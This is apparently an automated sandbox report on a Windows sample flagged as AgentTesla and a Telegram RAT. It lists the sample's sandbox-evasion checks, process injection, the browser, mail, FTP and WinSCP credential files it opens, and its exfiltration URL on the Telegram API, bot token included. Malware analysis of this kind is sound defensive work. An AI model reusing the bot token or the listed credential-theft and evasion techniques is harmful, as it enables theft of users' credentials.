                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 599344Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 599015Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 598797Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 598455Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 598328Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 598197Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 598094Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 597984Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 597868Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 597747Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 597639Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 597530Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 597412Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 597281Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 597172Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 597047Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 596937Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 596828Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 596719Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 596594Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 596484Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 596375Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 596265Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 596156Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 596046Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 595937Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 595828Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 595719Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 595609Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 595500Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 595375Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 595226Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 595057Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 594873Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 594764Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 594651Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 594547Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 594436Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 594328Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeThread delayed: delay time: 594219Jump to behavior
                  Source: xnlP06YunJ.exe, 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                  Source: xnlP06YunJ.exe, 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q 1:en-CH:Microsoft|VMWare|Virtual
                  Source: xnlP06YunJ.exe, 00000004.00000002.2107022086.0000000000C16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
                  Source: xnlP06YunJ.exe, 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                  Source: xnlP06YunJ.exe, 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q 1:en-CH:VMware|VIRTUAL|A M I|Xen
                  Source: xnlP06YunJ.exe, 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeMemory written: C:\Users\user\Desktop\xnlP06YunJ.exe base: 900000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /releaseJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess created: C:\Users\user\Desktop\xnlP06YunJ.exe "C:\Users\user\Desktop\xnlP06YunJ.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renewJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeQueries volume information: C:\Users\user\Desktop\xnlP06YunJ.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeQueries volume information: C:\Users\user\Desktop\xnlP06YunJ.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000004.00000002.2109400212.00000000028C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2109400212.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2109400212.0000000002887000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: xnlP06YunJ.exe PID: 524, type: MEMORYSTR
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 00000004.00000002.2109400212.00000000028C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: xnlP06YunJ.exe PID: 524, type: MEMORYSTR
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: Yara matchFile source: 00000004.00000002.2109400212.0000000002887000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: xnlP06YunJ.exe PID: 524, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000004.00000002.2109400212.00000000028C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2109400212.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2109400212.0000000002887000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: xnlP06YunJ.exe PID: 524, type: MEMORYSTR
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 00000004.00000002.2109400212.00000000028C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: xnlP06YunJ.exe PID: 524, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		2
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		111
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		1
                  Credentials in Registry                  		34
                  System Information Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  Scheduled Task/Job                  		3
                  Obfuscated Files or Information                  		Security Account Manager231
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                  Software Packing                  		NTDS1
                  Process Discovery                  		Distributed Component Object Model1
                  Clipboard Data                  		3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets161
                  Virtualization/Sandbox Evasion                  		SSHKeylogging14
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts161
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                  Process Injection                  		DCSync11
                  System Network Configuration Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632360 Sample: xnlP06YunJ.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 27 api.telegram.org 2->27 29 api.ipify.org 2->29 35 Suricata IDS alerts for network traffic 2->35 37 Found malware configuration 2->37 39 Multi AV Scanner detection for submitted file 2->39 43 9 other signatures 2->43 8 xnlP06YunJ.exe 3 2->8         started        signatures3 41 Uses the Telegram API (likely for C&C communication) 27->41 process4 signatures5 45 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->45 47 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->47 49 Injects a PE file into a foreign processes 8->49 11 xnlP06YunJ.exe 15 2 8->11         started        15 cmd.exe 1 8->15         started        17 cmd.exe 1 8->17         started        process6 dnsIp7 31 api.telegram.org 149.154.167.220, 443, 49683, 49691 TELEGRAMRU United Kingdom 11->31 33 api.ipify.org 104.26.13.205, 443, 49682 CLOUDFLARENETUS United States 11->33 51 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->51 53 Tries to steal Mail credentials (via file / registry access) 11->53 55 Tries to harvest and steal ftp login credentials 11->55 57 Tries to harvest and steal browser information (history, passwords, etc) 11->57 59 Uses ipconfig to lookup or modify the Windows network settings 15->59 19 conhost.exe 15->19         started        21 ipconfig.exe 1 15->21         started        23 conhost.exe 17->23         started        25 ipconfig.exe 1 17->25         started        signatures8 process9

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  xnlP06YunJ.exe72%VirustotalBrowse
                  xnlP06YunJ.exe61%ReversingLabsWin32.Trojan.Leonem

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  api.ipify.org
                  		104.26.13.205
                  		truefalse
                    		high
                    api.telegram.org
                    		149.154.167.220
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://api.ipify.org/false
                        		high
                        https://api.telegram.org/bot7351654760:AAFbpZoZSrKZKoCJV2by7hbyBL3xnGEoUrU/sendDocumentfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.telegram.org/bot7351654760:AAFbpZoZSrKZKoCJV2by7hbyBL3xnGEoUrU/xnlP06YunJ.exe, 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://api.ipify.orgxnlP06YunJ.exe, 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://github.com/mgravell/protobuf-netixnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmpfalse
                                		high
                                https://stackoverflow.com/q/14436606/23354xnlP06YunJ.exe, 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmpfalse
                                  		high
                                  https://account.dyn.com/xnlP06YunJ.exe, 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.telegram.orgxnlP06YunJ.exe, 00000004.00000002.2109400212.00000000028C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://github.com/mgravell/protobuf-netJxnlP06YunJ.exe, 00000000.00000002.1153257947.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmpfalse
                                        		high
                                        https://stackoverflow.com/q/11564914/23354;xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmpfalse
                                          		high
                                          https://stackoverflow.com/q/2152978/23354xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmpfalse
                                            		high
                                            https://github.com/StefH/System.Linq.Dynamic.Core/issues/358xnlP06YunJ.exefalse
                                              		high
                                              https://github.com/mgravell/protobuf-netxnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmpfalse
                                                		high
                                                https://github.com/mono/linker#link-xml-file-examplesxnlP06YunJ.exefalse
                                                  		high
                                                  https://api.ipify.org/txnlP06YunJ.exe, 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://api.telegram.orgxnlP06YunJ.exe, 00000004.00000002.2109400212.00000000028C3000.00000004.00000800.00020000.00000000.sdmp, xnlP06YunJ.exe, 00000004.00000002.2109400212.00000000028C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namexnlP06YunJ.exe, 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, xnlP06YunJ.exe, 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://github.com/mono/mono/issues/12917xnlP06YunJ.exefalse
                                                          		high

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          149.154.167.220
                                                          		api.telegram.orgUnited Kingdom
                                                          		62041TELEGRAMRUfalse
                                                          104.26.13.205
                                                          		api.ipify.orgUnited States
                                                          		13335CLOUDFLARENETUSfalse

                                                          General Information

                                                          Joe Sandbox version:42.0.0 Malachite
                                                          Analysis ID:1632360
                                                          Start date and time:2025-03-07 22:49:41 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 6m 41s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:17
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:xnlP06YunJ.exe
                                                          renamed because original name is a hash value
                                                          Original Sample Name:3301c867bfc564fad83be393a67e00cf4615b436940db9ed0728b3d4a523e040.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@13/0@2/2
                                                          EGA Information:
                                                          • Successful, ratio: 50%
                                                          HCA Information:
                                                          • Successful, ratio: 93%
                                                          • Number of executed functions: 177
                                                          • Number of non-executed functions: 12
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 2.16.185.191
                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, e16604.f.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, c.pki.goog
                                                          • Execution Graph export aborted for target xnlP06YunJ.exe, PID 524 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          16:51:05API Interceptor761642x Sleep call for process: xnlP06YunJ.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          149.154.167.220cqWZtEH4eJ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            axN56TZ3PI.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              bvhauD4o49.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                0CBJ3aLKx0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  CWu89IbJQw.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                    DayVXJx1km.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      NDCNDvC27F.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        3c638k0NJx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          drRbNknjyb.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            3GrfjMY0pG.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              104.26.13.205get_txt.ps1Get hashmaliciousLummaC StealerBrowse
                                                                              • api.ipify.org/
                                                                              XkgoE6Yb52.ps1Get hashmaliciousUnknownBrowse
                                                                              • api.ipify.org/
                                                                              R1TftmQpuQ.batGet hashmaliciousTargeted RansomwareBrowse
                                                                              • api.ipify.org/
                                                                              SpacesVoid Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                              • api.ipify.org/
                                                                              Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                              • api.ipify.org/
                                                                              BiXS3FRoLe.exeGet hashmaliciousTrojanRansomBrowse
                                                                              • api.ipify.org/
                                                                              lEUy79aLAW.exeGet hashmaliciousTrojanRansomBrowse
                                                                              • api.ipify.org/
                                                                              Simple1.exeGet hashmaliciousUnknownBrowse
                                                                              • api.ipify.org/
                                                                              2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                              • api.ipify.org/
                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                              • api.ipify.org/

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              api.ipify.orgkbdXtadZsM.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 104.26.12.205
                                                                              NBdxPYAgZf.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 172.67.74.152
                                                                              tmezkNPazz.exeGet hashmaliciousNetSupport RATBrowse
                                                                              • 104.26.12.205
                                                                              Launcher.exeGet hashmaliciousGrowtopia, Phoenix StealerBrowse
                                                                              • 104.26.13.205
                                                                              Launcher.exeGet hashmaliciousGrowtopiaBrowse
                                                                              • 104.26.13.205
                                                                              Launcher.exeGet hashmaliciousGrowtopia, Phoenix StealerBrowse
                                                                              • 104.26.12.205
                                                                              5aQpYG37db.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 104.26.12.205
                                                                              fls3eql72b.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 172.67.74.152
                                                                              yM5WEfAX4h.exeGet hashmaliciousUnknownBrowse
                                                                              • 172.67.74.152
                                                                              SecuriteInfo.com.Win64.Malware-gen.32406.15459.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.26.13.205
                                                                              api.telegram.orgcqWZtEH4eJ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              axN56TZ3PI.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              bvhauD4o49.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              0CBJ3aLKx0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              CWu89IbJQw.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
